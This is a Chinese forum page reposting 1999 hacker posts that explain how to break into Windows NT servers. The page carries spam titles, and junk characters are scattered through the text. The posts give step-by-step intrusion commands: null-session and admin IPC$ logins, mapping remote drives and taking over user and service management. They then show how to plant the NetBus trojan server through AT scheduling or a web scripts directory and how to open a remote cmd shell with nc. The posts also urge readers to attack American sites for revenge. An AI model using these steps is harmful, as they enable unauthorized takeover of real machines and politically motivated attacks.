天天爱天天做天天做天天吃中文|久久综合给久合久久综合|亚洲视频一区二区三区|亚洲国产综合精品2022

    • 

    <delect id="ixd07"></delect>
      

      

      汶上信息港
      
標(biāo)題: 關(guān)于“怎樣進入NT主機”的幾點補充 [打印本頁]
      

      
作者: 雜七雜八    時間: 2011-1-13 17:03
      
標(biāo)題: 關(guān)于“怎樣進入NT主機”的幾點補充
      《版主頁黑客工具和文章的幾個問題》中提到:% B3 u/ f2 s' N; V8 E/ A
      
請教,從版主頁上載得PINGER,GRINDER,LETMEIN等,卻不能用,PINGER安裝后,明明安裝前文件有1M多,但安裝完后生成的文件夾中只有PINGER。EXE,40多K,運行PINGER,設(shè)置好IP,點PING,彈出一個窗口(C++。。。),說出錯,然后關(guān)閉了,何故,是不是安裝有誤? 2。運行LETMEIN,彈出以下錯誤:連接文件LETMEIN。EXE到不存在的NETAPI32。DLL;NETGROUPGETUSERS。 是否說明需要NETAPI32。DLL文件,哪里有該DLL。 3。USAKILLER 的教學(xué)文章中提到需在WINNT4。0下運行以下步驟等,是否要求我的操作系統(tǒng)也是WINNT4。0 ,應(yīng)該不是吧? 4。NC FOR NT 是否要求我的操作系統(tǒng)為NT,還是服務(wù)器的操作系統(tǒng)為NT? 太多的問題需高手回答,我花那么多的時間和金錢下載這幾M文件卻不能用,實在窩囊哦, 強烈建議USAKILLER 等高手級的黑客寫更多的教學(xué)文章,以提高我國黑客水平。
      
2 |! Z* G0 h+ o$ |2 c7 i/ ]> 我的機子MMX166,WIN98,2。5G,32M內(nèi)存。
      
; `% ^% i+ Z( K. t; m+ d- H; [4 C& W( _1 ~( J- i/ a( x
      
黑客并不神秘,你只要了解操作系統(tǒng),學(xué)習(xí)一些操作系統(tǒng)的弱點,輔助相關(guān)的工具,就可以成功。
      
+ I$ N, s. V( d3 o9 Q0 o你的問題是,pinger, grinder, letmein等工具必須要在NT上運行,我們強烈建議,你一定要安裝NT,對于你的機器配制,和我們現(xiàn)在差不多,只是比你多了32M內(nèi)存,2G硬盤。
      
9 _& C8 ?" g* p' O( A* }其實,攻擊敵站,利用其操作系統(tǒng)本身的工具就可以了,比如,我們在NT上攻擊某服務(wù)器,該服務(wù)器為NT4.0,我們將做如下簡單事情就有可能成功,假設(shè)目標(biāo)NT的IP地址為111.111.111.111,做法如下:, y$ K# d' I* s$ o7 I
      
net use \\111.111.111.111\ipc$ "" /user:""2 {" k  x) I' Q: H# }
      
net.exe是NT的工具文件,該命令將和目標(biāo)服務(wù)器建立Null Session,如果成功,你可以查看該服務(wù)器上的共享目錄:
      
. s5 J/ A- B& vnet view \\111.111.111.111
      
1 ?& J2 e1 t. L/ J7 A當(dāng)然,如果你有該NT管理員密碼,就更好辦了,假設(shè)其管理員Admin密碼為fuck:7 y  u+ w1 C# m, f# u' s/ s9 O  k
      
net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"
      
. x6 L$ s- O0 v8 d& K! m命令成功后,幾乎所有目標(biāo)NT上的配制,資源,你都可以在你本地NT上連接遠(yuǎn)程計算機來查看或修改:
      
/ a" K( D# L) _1 N1、查看或修改遠(yuǎn)程機器上的硬盤,假如目標(biāo)NT上有C、D兩個硬盤:
      
  C3 y5 H; \7 `. D# g5 inet use x: \\111.111.111.111\c$! s2 E/ o$ K! A/ z2 Q7 t# s
      
net use y: \\111.111.111.111\d$& \; ?+ x2 H/ |% A. h+ E4 }
      
這樣,目標(biāo)NT上的C、D盤分別被影射為你本地的X、Y盤,你想怎么做都可以...
      
' t) y* v5 _0 F2、管理目標(biāo)NT的用戶:
      
. p$ f9 R6 w" \* {" x! H從“開始”->“程序”->“管理工具(公用)”->“域用戶管理器”->菜單:“用戶”->“選擇域”
      
8 a" C3 T' I+ e. m& V1 _鍵入\\111.111.111.111后,目標(biāo)NT上的所有用戶你想怎么做都可以,和管理你本地的一樣3 B3 y$ W4 i6 I
      
3、管理目標(biāo)NT的服務(wù)! l1 v0 |7 T% J
      
選擇“管理工具(公用)”->“服務(wù)器管理”->“計算機”->“選擇域”& x; s  z# [, M
      
這樣你可以管理目標(biāo)NT上的服務(wù),共享目錄
      
, t8 Q* n; U- l) g; O9 {4、IIS管理8 z$ a" Z# _. |, b# y4 E; V
      
選擇“Microsoft Internet Service管理”->“Internet 服務(wù)管理器”->"連接到服務(wù)器"->111.111.111.111
      
# P; o0 G8 f) b( o2 T6 ^. o% R目標(biāo)NT的FTP、WWW服務(wù)你就可以重新配置5 x1 u% Y& c8 G6 {, P, a& B
      
5、事件管理9 [3 |9 o! F4 G; T; U
      
“事件查看器”->連接到服務(wù)器->111.111.111.111% N/ s4 c# ^, ~, T' v' N
      
; `, U6 m' C2 [; n$ G+ q: N
      
還有更多的東西,都可以用NT本身的功能來完成,這些都是95, 98所不能實現(xiàn)的。
      
* `$ h, k7 n2 @  g8 c9 F1 V! M% u/ Q3 u' K; X
      
當(dāng)然,98,95也能做一些事情,但很麻煩,比如:
      
) t' e  _1 s$ ^" {: L% ~net use \\111.111.111.111\ipc$" l1 ?8 [1 n8 u3 i2 p
      
net use z: \\111.111.111.111\d$% T$ k& ]( o& A2 A) ~
      
但其后不能帶參數(shù),即改用其他用戶或密碼,系統(tǒng)將用當(dāng)前用戶和密碼去登錄,如果你知道目標(biāo)NT的用戶或密碼,重新啟動95, 98,改用該用戶和密碼登錄,方可實現(xiàn),你可以連接目標(biāo)NT上的共享資源,但不能進行管理,如用戶、事件等
      
3 S4 A- _2 U, J0 y$ ~3 E6 L+ X, P/ z2 H6 q
      
我們強烈建議各位有心要為死難者報仇,真正的想黑霉國的站點,花點時間,裝個NT吧,NT Workstation也可以!
      
5 f: Q0 Y* w& F! ~  x5 d# G這樣,你還可以了解目標(biāo)機器上能有什么東東供你去用!/ ]: n0 l2 M: M- b/ n; z0 z+ x& [
      

      
/ n7 g- \6 P6 _: m
      
! G% l* _$ J8 }+ e' A: e5 p, V( S--------------------------------------------------------------------------------
      
, ~) |# ]8 n2 a
      
# Q6 v4 Z- E) _+ y>quack于1999-06-12,23:37:44. Q! j' B) q8 Z0 |- a, D
      
在大作《幾個有關(guān)黑的問題》中提到:! ^1 Z/ ?- }% r6 y
      
首先向各位黑兄們致敬,我下了你們的傳的東東,但發(fā)現(xiàn)在用LETMEIN.EXE的時候沒有用到MYPWD的參數(shù),鍵入LETMEIN查詢其使用方法時亦無此參數(shù)項,不知為是何原因?另,用PINGER查詢到的IP地址若無機器名的是否可以直接進入,我怎么用NET USE總無法登陸?再有,假定我上傳了CIH,對了,CIH對NT暫時無效,假定上傳其它"有益"美國NT主機的東東上去,而未傳NETBUS,可否直接在其機了運行此東東使其當(dāng)堂暴斃?--我曾用LEGION上美國機子,但運行程序時卻是在我的機上干活,差點把自己斃了!再有,我在微軟的CHAT中常遇到美國鬼子,在其CHAT下怎樣才能看到它的IP?怎樣把它們給KILL了?--順便說一句,我還真干掉了幾個美國人,哈!。
      
# I4 c: A$ S5 T) @1 |: S( g, i! g5 U/ [. r; }/ H
      
killusa于1999-06-13,03:25:15
      
) Z7 v8 ~1 N0 U7 B0 G在大作《Re: 幾個有關(guān)黑的問題》中提到:0 |2 K# B0 A2 Q
      

      
# Z% c6 {' u; cletmein.exe 暫時沒有mypwd參數(shù),十分抱歉
      
( g  [  W7 @% J. f- upinger程序,只是利用ping來尋找主機,每臺NT服務(wù)器有一個主IP地址,但也可以設(shè)置多個輔助IP地址,比如有些服務(wù)器供應(yīng)商,一臺NT服務(wù)器上可以設(shè)置一千多個IP,每個IP對應(yīng)一個Hostname,而真正能找到主機名的只有一個IP地址,就是該主機的主IP地址,所以有時顯示只有IP,而無主機名。另外,有些服務(wù)器是非NT的操作系統(tǒng),有時將不會顯示主機名。當(dāng)然,有時在服務(wù)器上進行一些設(shè)置,也會出現(xiàn)上面的情況。2 x1 u( @6 E! Q- `
      
4 ]9 ]: ]8 I1 ], A
      
Netbus分客戶端程序ntsrv.exe和服務(wù)器端netbus.exe兩個程序,所以,netbus.exe是不用上傳的,只需在目的
      
2 G1 v3 R# ~( o) q5 e服務(wù)器上運行ntsrv.exe,而在目的服務(wù)器運行該程序有很多種方法:
      
9 v+ n4 A* ?: M) M/ i% k- o0 }5 i
      
7 v- s/ h+ w* m% c( U0 \! q" E1、利用服務(wù)器的 Schedule 服務(wù)來啟動schedule 服務(wù)是指在服務(wù)器上定時運行某程序,具體使用方法,可在自己的NT Dos窗口下鍵入以下:$ e: v$ q# v5 n1 _  E( r! t  l
      

      
$ Y8 |- u$ d1 e: j+ j. XC:\>net start schedule' A4 r2 ?, f9 B6 f8 l- {, X2 \- j2 k
      
Schedule 正在啟動服務(wù).....
      
8 ^% i" q  |3 y7 e1 n4 l4 USchedulw 服務(wù)啟動成功。
      
0 {2 G  ^! ?# q8 L0 uC:\>at /?
      
7 \1 K) N6 k0 h- v$ aAT 命令排定在特定的日期和時間運行某些命令和程序。
      
) p- h* H% |& P. p6 m7 J) U運行 AT 命令之前必須先啟動 Schedule 服務(wù)。- l! J4 O0 g" K! t7 N
      
; h/ P( f; N- G! G
      
AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
      
# ?" @; o+ z' O3 H7 x+ J, lAT [\\computername] time [/INTERACTIVE]4 F1 s) @7 Y4 F; C
      
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"; ]9 v3 A2 n/ Y
      
0 R. _2 m* X. J3 Z0 b
      
\\computername 指定遠(yuǎn)程計算機。 如果省略這個參數(shù)
      
5 m5 j. q+ b6 P6 `9 {8 R5 m, {命令會被排定在本機上運行。- X% |; q% r2 V( E& c& Z% Y- p
      
id 指定給排定進度命令的識別號。7 Y& u" _& u4 z+ f8 X$ X
      
6 l9 a* w, u* j: }
      
/delete 刪除某個已排定進度的命令。如果省略標(biāo)識,計算機上所有已排定進度的命令都會被刪除。
      
2 w3 A( T9 N+ i& _/yes 用于刪除所有作業(yè),且不想在運行刪除時顯示確認(rèn)信息 。4 [5 w8 C% e8 ^2 P9 F: w  X3 k
      
time 指定命令運行的時間。; ^, \7 C& }( q! _' l2 T& ^6 Y$ @
      
/interactive 允許作業(yè)在運行時,與用戶通過桌面交互。
      
, C2 ^4 O; O1 I- |6 g2 f8 X0 t0 d6 C3 U( d$ A: E9 Z# W
      
/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運行命令。+ f0 q& j, ?& a
      
如果省略日期,則默認(rèn)為在每月的本日運行。
      
) I  O% w" S2 ~0 z
      
8 C9 X$ O: p, O1 F4 m/next:date[,...] 指定在下一個指定日期 (如,下周三),運行命令。如果省略日期,則默認(rèn)為在每月的本日運行。
      
+ ^; g* N( l* h  Z) J6 @$ a" K" E/ z3 G6 ~4 U5 d- U
      
"command" 準(zhǔn)備運行的 Windows NT 命令或批處理文件。
      
) l4 D  b4 n1 ?. _  L/ z- V9 H
      
& b. r8 Q) g* u2 b8 m* U0 wC:\>4 z1 U, |" z1 d
      
+ ]" [) F3 j6 b/ b% `+ m; R
      
知道了如何使用AT,再來看看如何在遠(yuǎn)程NT上運行ntsrv.exe:& C4 {2 }) b* f# Z- v
      
1 利用管理員登陸到目的服務(wù)器,方法為: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
      
$ S* M+ C- O/ q" @2 利用ntsrv.exe啟動遠(yuǎn)程: netsvc \\x.x.x.x schedule /start- A6 B7 J+ o- U5 X4 G# F
      
3 利用AT.EXE在遠(yuǎn)程服務(wù)器設(shè)置程序定時運行,當(dāng)然最快運行最理想,所以,你可以用letmein.exe得到服務(wù)器的時間,然后:& \( B: a. }( P5 o. @
      
at \\x.x.x.x 00:00 ntsrv.exe /port:64321" R" i7 Q- W7 q' J
      
其中00:00要改為用letmein.exe得回來的具體時間+一點容量,等一會后,再在本地啟動netbus.exe,鍵入目的服務(wù)器得ip地址或hostname,連接!具體使用可參照 "How to get in nt",比如第一種方法,你想要在目的服務(wù)器運行 LEGION,可以利用netbus得上傳功能,將LEGION上傳至目的服務(wù)器,再用netbus的"Start program",鍵入完整路徑的LEGION運行程序,就ok了!第二種方法是利用netbus的“App redirect”功能,啟動遠(yuǎn)程telnet服務(wù),如下:在netbus中擊“App redirect”,鍵入"C:\>winnt\system32\cmd.exe",Port為:4321,服務(wù)就啟動了,然后在本地運行:nc x.x.x.x 4321,出現(xiàn)dos啟動的畫面就表示連接成功:5 @4 j7 B- {, A
      
Microsoft(R) Windows NT(TM)
      
/ C5 [' o2 ~( z2 N1 O: u$ `; N  C- r; d(C) Copyright 1985-1996 Microsoft Corp.9 B6 S# f& P3 |2 I7 W! }
      
C:\>  }, p/ Y8 t  s: O# i, ?# U
      

      
5 r1 s0 h1 S6 f+ n  u9 I7 N2、利用web啟動ntsrv.exe或其他程序在目的服務(wù)器# S; J; y2 A' `# B3 l* G
      

      
- v/ ^! }6 E! v5 c5 w9 r, I8 d將ntsrv.exe 或其他運行程序Copy到目的服務(wù)器的www可執(zhí)行目錄,如cgi-bin或scripts,然后在瀏覽器鍵入url如:
      
! m# |- Z/ \4 t+ u* ~http://x.x.x.x/scripts/ntsrv.exe /port:64321
      
1 L/ T2 L, ?6 Z& k2 L; h2 thttp://x.x.x.x/cgi-gin/ntsrv.exe /port:64321. Z! ^, Q, V9 J: i& g
      
該程序就啟動了: Z8 ~# q# W3 V
      
' h! c: x( V$ K, K$ U
      
我只提這幾中方法!2 ?- W; H& U8 l! Y
      
要成功,必須打好基礎(chǔ)工,對操作系統(tǒng)充分了解!
      
9 k" V" X% v/ v" r# M; ~8 [0 t- m3 _0 k0 H9 S# u$ H# H5 K
      





      

      

      歡迎光臨 汶上信息港 (http://vancelump.com/)

Powered by Discuz! X3.5